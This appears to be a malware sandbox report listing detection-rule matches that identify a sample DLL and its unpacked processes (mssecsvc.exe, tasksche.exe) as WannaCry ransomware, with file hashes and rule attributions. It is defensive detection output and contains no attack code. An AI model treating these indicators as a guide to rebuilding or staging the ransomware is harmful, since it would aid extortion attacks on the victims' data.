              Source: y2jb4FtSNq.dll, type: SAMPLE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: y2jb4FtSNq.dll, type: SAMPLE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
